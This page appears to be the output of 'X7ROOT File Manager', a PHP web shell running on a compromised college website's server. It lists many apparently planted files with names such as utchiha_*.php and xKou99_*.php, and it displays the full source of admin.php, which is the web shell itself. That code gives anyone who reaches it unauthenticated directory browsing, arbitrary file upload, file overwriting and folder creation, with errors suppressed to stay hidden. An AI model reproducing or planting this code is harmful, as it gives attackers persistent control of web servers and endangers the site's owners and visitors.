X7ROOT File Manager
Current Path:
/var/sentora/hostdata/konguhitek/public_html
var
/
sentora
/
hostdata
/
konguhitek
/
public_html
/
📁
..
📄
.htaccess
(63 B)
📄
70feie.php
(4.7 KB)
📄
PuNiSheRsRe_xDNMM3IK.php
(0 B)
📄
R&D.php
(33.07 KB)
📄
about.php
(4.23 KB)
📄
about1751417440.php
(5.74 KB)
📄
admin.php
(4.23 KB)
📄
admission.php
(76.48 KB)
📄
alumni.php
(36.5 KB)
📄
brig.html
(1.11 KB)
📄
civil_engineering.php
(21.83 KB)
📄
class.php
(0 B)
📄
committees.php
(24.86 KB)
📄
contact.php
(7 KB)
📁
css
📄
department.php
(3.95 KB)
📄
department_activities.php
(2.33 KB)
📄
edc.php
(6.75 KB)
📄
events.php
(7.2 KB)
📄
facilities.php
(3.58 KB)
📄
feedback.php
(27.25 KB)
📄
filter.php
(881 B)
📁
fonts
📄
footer.php
(18.51 KB)
📄
gallery copy.php
(37.84 KB)
📄
gallery.php
(9.33 KB)
📄
header.php
(14.1 KB)
📄
iipc.php
(45.19 KB)
📁
images
📄
index.html
(181 B)
📄
index.php
(28.67 KB)
📄
jga.php
(0 B)
📄
jobs copy.php
(860 B)
📄
jobs.php
(27.38 KB)
📁
js
📁
ktgadmin
📄
mld.txt
(1 B)
📄
mou.php
(30.11 KB)
📄
news_details.php
(2.28 KB)
📄
placement.php
(12.08 KB)
📁
plugins
📄
putkmsz.php
(4.92 KB)
📄
robots.txt
(1.09 KB)
📄
send_1751421498.php
(192.75 KB)
📄
student_activities.php
(4.03 KB)
📄
student_corner.php
(34.04 KB)
📄
style.php
(28 B)
📄
sw_rex_v2.js
(50 B)
📄
tmnvan.php
(1.4 KB)
📁
uploads
📄
utchiha_2aMtLW3Y.php
(0 B)
📄
utchiha_6DgilRNm.txt
(9 B)
📄
utchiha_Gw6LMY1H.php
(8 KB)
📄
utchiha_L9dwha7s.php
(8 KB)
📄
utchiha_MVYTcKX1.php
(214.79 KB)
📄
utchiha_SEsPQxII.php
(8 KB)
📄
utchiha_WYpTbrci.txt
(10 B)
📄
utchiha_qDN2zSra.php
(8 KB)
📄
utchiha_rlmZwxb1.php
(0 B)
📄
vjaacyo.php
(4.92 KB)
📄
wp-filter.php
(374 B)
📄
xKou99_0E0rcROc.php
(0 B)
📄
xKou99_2VYeDNmG.php
(0 B)
📄
xKou99_smgW3Y78.php
(0 B)
📄
zi.php
(1.55 KB)
📄
zoo.php
(0 B)
Editing: admin.php
<?php @ini_set('display_errors', 0); @set_time_limit(0); error_reporting(0); function safe($s) { return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8'); } function formatSize($bytes) { $units = ['B','KB','MB','GB','TB']; for ($i = 0; $bytes >= 1024 && $i < count($units)-1; $i++) { $bytes /= 1024; } return round($bytes, 2).' '.$units[$i]; } $cwd = isset($_GET['path']) ? $_GET['path'] : getcwd(); $cwd = realpath($cwd); // Handle upload if (isset($_POST['upload']) && isset($_FILES['file'])) { $target = $cwd . '/' . basename($_FILES['file']['name']); if (@move_uploaded_file($_FILES['file']['tmp_name'], $target)) { echo "<div style='color:#0f0'>[+] File uploaded successfully.</div>"; } else { echo "<div style='color:#f00'>[-] Upload failed.</div>"; } } // Handle file edit save if (isset($_POST['save']) && isset($_POST['filename'])) { $path = $cwd.'/'.basename($_POST['filename']); if (@file_put_contents($path, $_POST['content']) !== false) { echo "<div style='color:#0f0'>[+] File saved successfully.</div>"; } else { echo "<div style='color:#f00'>[-] Failed to save file.</div>"; } } // Handle create directory if (isset($_POST['mkdir']) && isset($_POST['dirname'])) { $dirName = basename($_POST['dirname']); $fullPath = $cwd . '/' . $dirName; if (!file_exists($fullPath)) { if (@mkdir($fullPath)) { echo "<div style='color:#0f0'>[+] Directory created.</div>"; } else { echo "<div style='color:#f00'>[-] Failed to create directory.</div>"; } } else { echo "<div style='color:#f90'>[!] Directory already exists.</div>"; } } echo "<!DOCTYPE html><html lang='en'><head><meta charset='UTF-8'><title>File Manager</title><style> body { background:#0d0d0d; color:#ccc; font-family:monospace; padding:20px; } a { color:#5af; text-decoration:none; } a:hover { text-decoration:underline; } input, textarea, select { background:#111; color:#0f0; border:1px solid #444; padding:5px; width:100%; } input[type=submit] { background:#222; color:#0f0; border:1px solid #0f0; cursor:pointer; } hr { border:none; border-top:1px solid #333; margin:20px 0; } .dir { color:#0ff; } .file { color:#fff; } .size { color:#999; float:right; } h2 { margin:0 0 10px 0; } </style></head><body>"; echo "<h2>X7ROOT File Manager</h2>"; echo "<b>Current Path:</b> ".safe($cwd)."<hr>"; // Show navigation $parts = explode(DIRECTORY_SEPARATOR, $cwd); $nav = ""; $build = ""; foreach ($parts as $p) { if ($p == "") continue; $build .= "/$p"; $nav .= "<a href='?path=".urlencode($build)."'>".safe($p)."</a> / "; } echo $nav."<hr>"; // File listing $files = @scandir($cwd); echo "<ul style='list-style:none;padding:0;'>"; foreach ($files as $f) { if ($f == ".") continue; $fp = $cwd.'/'.$f; if (is_dir($fp)) { echo "<li class='dir'>📁 <a href='?path=".urlencode($fp)."'>".safe($f)."</a></li>"; } else { echo "<li class='file'>📄 <a href='?path=".urlencode($cwd)."&edit=".urlencode($f)."'>".safe($f)."</a><span class='size'>(".formatSize(filesize($fp)).")</span></li>"; } } echo "</ul><hr>"; // Edit file if (isset($_GET['edit'])) { $file = basename($_GET['edit']); $full = $cwd.'/'.$file; if (file_exists($full)) { $content = @file_get_contents($full); echo "<h3>Editing: ".safe($file)."</h3>"; echo "<form method='post'>"; echo "<input type='hidden' name='filename' value='".safe($file)."'>"; echo "<textarea name='content' rows='15'>".safe($content)."</textarea><br>"; echo "<input type='submit' name='save' value='Save File'>"; echo "</form><hr>"; } } // Upload echo "<h3>Upload File</h3>"; echo "<form method='post' enctype='multipart/form-data'>"; echo "<input type='file' name='file'><br>"; echo "<input type='submit' name='upload' value='Upload'>"; echo "</form><hr>"; // Create folder echo "<h3>Create Folder</h3>"; echo "<form method='post'>"; echo "<input type='text' name='dirname' placeholder='New folder name'>"; echo "<input type='submit' name='mkdir' value='Create'>"; echo "</form>"; echo "</body></html>";
Upload File
Create Folder